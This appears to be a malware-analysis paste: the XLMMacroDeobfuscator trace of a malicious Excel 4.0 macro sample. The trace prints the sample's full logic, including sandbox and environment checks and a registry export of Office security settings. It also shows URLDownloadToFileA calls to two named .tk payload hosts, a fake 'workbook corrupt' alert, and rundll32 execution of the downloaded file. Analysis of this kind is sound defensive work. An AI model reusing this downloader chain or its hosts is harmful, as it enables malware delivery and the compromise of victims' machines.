dissectmalware

XLM deobfuscation - MID function

May 20th, 2020
  1. pip install -U https://github.com/DissectMalware/XLMMacroDeobfuscator/archive/master.zip
  2. Hash: fa2b9bbfdd4930a5db55dc42e0cdbb3ee31539021f2dae588bcb61b0ebe6b189
  3. [Loading Cells]
  4. auto_open: auto_open->C9Nh5oESJrL7acc7MrbLK3jf8r35YV!$HO$18358
  5. [Starting Deobfuscation]
  6. CELL:HO18358 , FullEvaluation ,SET.VALUE(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!AN46618," !""#$%&'()*+,-./01")
  7. CELL:HO18359 , FullEvaluation ,GOTO(AE64869)
  8. CELL:AE64869 , FullEvaluation ,SET.VALUE(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!BT58881,"23456789:;<=>?@ABCD")
  9. CELL:AE64870 , FullEvaluation ,RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!AD34266)
  10. CELL:AD34266 , FullEvaluation ,SET.VALUE(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!HQ17800,"EFGHIJKLMNOPQRSTUVW")
  11. CELL:AD34267 , FullEvaluation ,GOTO(EJ28171)
  12. CELL:EJ28171 , FullEvaluation ,SET.VALUE(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!HU8314,"XYZ[\]^_`abcdefghij")
  13. CELL:EJ28172 , FullEvaluation ,GOTO(DG7150)
  14. CELL:DG7150 , FullEvaluation ,SET.VALUE(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!IA48760,"klmnopqrstuvwxyz{|}")
  15. CELL:DG7151 , FullEvaluation ,GOTO(G56331)
  16. CELL:G56331 , FullEvaluation ,FORMULA("=CLOSE(FALSE)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!IS50994)
  17. CELL:G56332 , FullEvaluation ,RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!L48127)
  18. CELL:L48127 , FullEvaluation ,FORMULA("=APP.MAXIMIZE()",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!L48128)
  19. CELL:L48128 , NotImplemented ,APP.MAXIMIZE()
  20. CELL:L48129 , FullEvaluation ,RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!AP59590)
  21. CELL:AP59590 , FullEvaluation ,FORMULA("=IF(GET.WINDOW(7),GOTO(R[-8597]C[211]),)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!AP59591)
  22. CELL:AP59591 , FullEvaluation ,IF(GET.WINDOW(7),GOTO(R[-8597]C[211]),)
  23. CELL:AP59592 , FullEvaluation , GOTO(FP60809)
  24. CELL:FP60809 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R[-9816]C[81]))",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FP60810)
  25. CELL:FP60810 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R[-9816]C[81]))
  26. CELL:FP60811 , FullEvaluation , GOTO(IC65396)
  27. CELL:IC65396 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R[-14403]C[16]),)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!IC65397)
  28. CELL:IC65397 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R[-14403]C[16]),)
  29. CELL:IC65398 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!GU7152)
  30. CELL:GU7152 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R[43841]C[50]),)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!GU7153)
  31. CELL:GU7153 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R[43841]C[50]),)
  32. CELL:GU7154 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!DT3410)
  33. CELL:DT3410 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R[47583]C[129]),)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!DT3411)
  34. CELL:DT3411 , FullBranching , IF(GET.WORKSPACE(13)<770,GOTO(R[47583]C[129]),)
  35. CELL:DT3411 , FullEvaluation , [TRUE] GOTO(R[47583]C[129])
  36. CELL:IS50994 , End , CLOSE(FALSE)
  37. CELL:DT3411 , FullEvaluation , [FALSE]
  38. CELL:DT3412 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CM35853)
  39. CELL:CM35853 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R[15140]C[162]),)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CM35854)
  40. CELL:CM35854 , FullBranching , IF(GET.WORKSPACE(14)<390,GOTO(R[15140]C[162]),)
  41. CELL:CM35854 , FullEvaluation , [TRUE] GOTO(R[15140]C[162])
  42. CELL:IS50994 , End , CLOSE(FALSE)
  43. CELL:CM35854 , FullEvaluation , [FALSE]
  44. CELL:CM35855 , FullEvaluation , GOTO(CK51623)
  45. CELL:CK51623 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R[-630]C[164]))",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CK51624)
  46. CELL:CK51624 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R[-630]C[164]))
  47. CELL:CK51625 , FullEvaluation , GOTO(FP50981)
  48. CELL:FP50981 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R[12]C[81]))",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FP50982)
  49. CELL:FP50982 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R[12]C[81]))
  50. CELL:FP50983 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CK61340)
  51. CELL:CK61340 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R[-10347]C[164]))",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CK61341)
  52. CELL:CK61341 , FullEvaluation , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R[-10347]C[164]))
  53. CELL:CK61342 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!IA40525)
  54. CELL:IA40525 , FullEvaluation , FORMULA("=""EXPORT HKCU\Software\Microsoft\Office\""",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!DE20419)
  55. CELL:IA40526 , FullEvaluation , GOTO(DZ43796)
  56. CELL:DZ43796 , FullEvaluation , FORMULA("=""C:\Users\Public\ohzMz.reg""",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!EY35234)
  57. CELL:DZ43797 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!IU37484)
  58. CELL:IU37484 , FullEvaluation , FORMULA("=R[-9767]C[-115]&GET.WORKSPACE(2)&""\Excel\Security ""&R[5048]C[-69]&"" /y""",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!HP30186)
  59. CELL:IU37485 , FullEvaluation , GOTO(BF24402)
  60. CELL:BF24402 , FullEvaluation , FORMULA("=""C:\Windows\system32\reg.exe""",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!BQ53153)
  61. CELL:BF24403 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CF44918)
  62. CELL:CF44918 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[8234]C[-15],R[-14733]C[140],0,5)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CF44919)
  63. CELL:CF44919 , NotImplemented , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",35152GET.WORKSPACE(2)\Excel\Security O49967 /y,0,5)
  64. CELL:CF44920 , FullEvaluation , GOTO(FV65441)
  65. CELL:FV65441 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R[-30210]C[-23])))",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FV65444)
  66. CELL:FV65442 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FV65445)
  67. CELL:FV65443 , FullEvaluation , FORMULA("=NEXT()",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FV65446)
  68. CELL:FV65444 , PartialEvaluation , WHILE("C:\Users\Public\ohzMz.reg")
  69. CELL:FV65445 , PartialEvaluation , WAIT(NOW()+"00:00:01")
  70. CELL:FV65446 , PartialEvaluation , NEXT()
  71. CELL:FV65447 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!AA60042)
  72. CELL:AA60042 , FullEvaluation , FORMULA("=FOPEN(R[-24809]C[128])",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!AA60043)
  73. CELL:AA60043 , PartialEvaluation , FOPEN("C:\Users\Public\ohzMz.reg")
  74. CELL:AA60044 , FullEvaluation , GOTO(AY30021)
  75. CELL:AY30021 , FullEvaluation , FORMULA("=FPOS(R[30021]C[-24],215)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!AY30022)
  76. CELL:AY30022 , PartialEvaluation , FPOS("""C:\Users\Public\ohzMz.reg""",215)
  77. CELL:AY30023 , FullEvaluation , GOTO(HD22993)
  78. CELL:HD22993 , FullEvaluation , FORMULA("=FREAD(R[37049]C[-185],255)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!HD22994)
  79. CELL:HD22994 , PartialEvaluation , FREAD("""C:\Users\Public\ohzMz.reg""",255)
  80. CELL:HD22995 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!GM60823)
  81. CELL:GM60823 , FullEvaluation , FORMULA("=FCLOSE(R[-781]C[-168])",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!GM60824)
  82. CELL:GM60824 , PartialEvaluation , FCLOSE("""C:\Users\Public\ohzMz.reg""")
  83. CELL:GM60825 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!IF51216)
  84. CELL:IF51216 , FullEvaluation , FORMULA("=FILE.DELETE(R[-15983]C[-85])",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!IF51217)
  85. CELL:IF51217 , NotImplemented , FILE.DELETE(R[-15983]C[-85])
  86. CELL:IF51218 , FullEvaluation , GOTO(AE21772)
  87. CELL:AE21772 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[1221]C[181])),GOTO(R[29221]C[222]),)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!AE21773)
  88. CELL:AE21773 , FullEvaluation , IF(ISNUMBER(SEARCH("0001",R[1221]C[181])),GOTO(R[29221]C[222]),)
  89. CELL:AE21774 , FullEvaluation , GOTO(GO59474)
  90. CELL:GO59474 , FullEvaluation , FORMULA("=""C:\Users\Public\Qrr8oK.html""",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!HK34324)
  91. CELL:GO59475 , FullEvaluation , GOTO(HL30814)
  92. CELL:HL30814 , FullEvaluation , FORMULA("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!IR33228)
  93. CELL:HL30815 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FV57194)
  94. CELL:FV57194 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-23967]C[74],R[-22871]C[41],0,0)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FV57195)
  95. CELL:FV57195 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates","C:\Users\Public\Qrr8oK.html",0,0)
  96. CELL:FV57196 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!GB55099)
  97. CELL:GB55099 , FullEvaluation , FORMULA("=FILES(R[-20776]C[35])",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!GB55100)
  98. CELL:GB55100 , PartialEvaluation , FILES("C:\Users\Public\Qrr8oK.html")
  99. CELL:GB55101 , FullEvaluation , GOTO(AV15376)
  100. CELL:AV15376 , FullEvaluation , FORMULA("=IF(ISERROR(R[39723]C[136]),GOTO(R[35617]C[205]),)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!AV15377)
  101. CELL:AV15377 , FullBranching , IF(ISERROR(R[39723]C[136]),GOTO(R[35617]C[205]),)
  102. CELL:AV15377 , FullEvaluation , [TRUE] GOTO(R[35617]C[205])
  103. CELL:IS50994 , End , CLOSE(FALSE)
  104. CELL:AV15377 , FullEvaluation , [FALSE]
  105. CELL:AV15378 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FQ29573)
  106. CELL:FQ29573 , FullEvaluation , SET.VALUE(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!DK40785,"klmnopqrstuvwxyz{|}")
  107. CELL:FQ29574 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!EA17260)
  108. CELL:EA17260 , FullEvaluation , SET.VALUE(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FU2407,"XYZ[\]^_`abcdefghij")
  109. CELL:EA17261 , FullEvaluation , GOTO(CH48519)
  110. CELL:CH48519 , FullEvaluation , SET.VALUE(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!EM11199,"EFGHIJKLMNOPQRSTUVW")
  111. CELL:CH48520 , FullEvaluation , GOTO(GQ8435)
  112. CELL:GQ8435 , FullEvaluation , SET.VALUE(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CL18870,"23456789:;<=>?@ABCD")
  113. CELL:GQ8436 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FU27428)
  114. CELL:FU27428 , FullEvaluation , SET.VALUE(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!DT34576," !""#$%&'()*+,-./01")
  115. CELL:FU27429 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!IR50328)
  116. CELL:IR50328 , FullEvaluation , FORMULA("=""C:\Users\Public\BgAlTgIN.html""",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CX30111)
  117. CELL:IR50329 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FB21194)
  118. CELL:FB21194 , FullEvaluation , FORMULA("=""https://clicmiscentfrussoting.tk/wp-keys.php""",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!AU61789)
  119. CELL:FB21195 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CV12822)
  120. CELL:CV12822 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-2855]C[-190],R[-34533]C[-135],0,0)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!IC64644)
  121. CELL:CV12823 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FZ59938)
  122. CELL:FZ59938 , FullEvaluation , FORMULA("=FILES(R[-23363]C[-77])",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FW53474)
  123. CELL:FZ59939 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!J1196)
  124. CELL:J1196 , FullEvaluation , FORMULA("=IF(ISERROR(R[-3734]C[41]),,RUN(R[-889]C[-81]))",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!EH57208)
  125. CELL:J1197 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!DL26975)
  126. CELL:DL26975 , FullEvaluation , FORMULA("=""https://riesperetidtur.tk/wp-keys.php""",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!GO31937)
  127. CELL:DL26976 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CQ22758)
  128. CELL:CQ22758 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-24140]C[-48],R[-25966]C[-143],0,0)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!IK56077)
  129. CELL:CQ22759 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!AV5044)
  130. CELL:AV5044 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CF52828)
  131. CELL:AV5045 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CZ22389)
  132. CELL:CZ22389 , FullEvaluation , FORMULA("=ALERT(R[-3491]C[27])",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!BE56319)
  133. CELL:CZ22390 , FullEvaluation , GOTO(GS26315)
  134. CELL:GS26315 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FJ56471)
  135. CELL:GS26316 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!BH17087)
  136. CELL:BH17087 , FullEvaluation , FORMULA("=R[-12030]C[35]&"",DllRegisterServer""",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!BO42141)
  137. CELL:BH17088 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CB18063)
  138. CELL:CB18063 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[2749]C[1],R[-11581]C[-98],0,5)",C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FI53722)
  139. CELL:CB18064 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!IC64644)
  140. CELL:IC64644 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://clicmiscentfrussoting.tk/wp-keys.php","C:\Users\Public\BgAlTgIN.html",0,0)
  141. CELL:IC64645 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FW53474)
  142. CELL:FW53474 , PartialEvaluation , FILES("C:\Users\Public\BgAlTgIN.html")
  143. CELL:FW53475 , FullEvaluation , GOTO(EH57208)
  144. CELL:EH57208 , FullBranching , IF(ISERROR(R[-3734]C[41]),,RUN(R[-889]C[-81]))
  145. CELL:EH57208 , FullEvaluation , [TRUE]
  146. CELL:EH57209 , FullEvaluation , GOTO(GO31937)
  147. CELL:GO31937 , FullEvaluation , "https://riesperetidtur.tk/wp-keys.php"
  148. CELL:GO31938 , FullEvaluation , GOTO(IK56077)
  149. CELL:IK56077 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"""https://riesperetidtur.tk/wp-keys.php""","C:\Users\Public\BgAlTgIN.html",0,0)
  150. CELL:IK56078 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!CF52828)
  151. CELL:CF52828 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  152. CELL:CF52829 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!BE56319)
  153. CELL:BE56319 , PartialEvaluation , ALERT("""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""")
  154. CELL:BE56320 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FJ56471)
  155. CELL:FJ56471 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  156. CELL:FJ56472 , FullEvaluation , GOTO(BO42141)
  157. CELL:BO42141 , FullEvaluation , C:\Users\Public\BgAlTgIN.html,DllRegisterServer
  158. CELL:BO42142 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FI53722)
  159. CELL:FI53722 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","C:\Users\Public\BgAlTgIN.html,DllRegisterServer",0,5)
  160. CELL:FI53723 , FullEvaluation , GOTO(IS50994)
  161. CELL:IS50994 , End , CLOSE(FALSE)
  162. CELL:EH57208 , FullEvaluation , [FALSE] RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!BE56319)
  163. CELL:BE56319 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  164. CELL:BE56320 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FJ56471)
  165. CELL:FJ56471 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  166. CELL:FJ56472 , FullEvaluation , GOTO(BO42141)
  167. CELL:BO42141 , FullEvaluation , C:\Users\Public\BgAlTgIN.html,DllRegisterServer
  168. CELL:BO42142 , FullEvaluation , RUN(C9Nh5oESJrL7acc7MrbLK3jf8r35YV!FI53722)
  169. CELL:FI53722 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","C:\Users\Public\BgAlTgIN.html,DllRegisterServer",0,5)
  170. CELL:FI53723 , FullEvaluation , GOTO(IS50994)
  171. CELL:IS50994 , End , CLOSE(FALSE)
  172. time elapsed: 5.211049795150757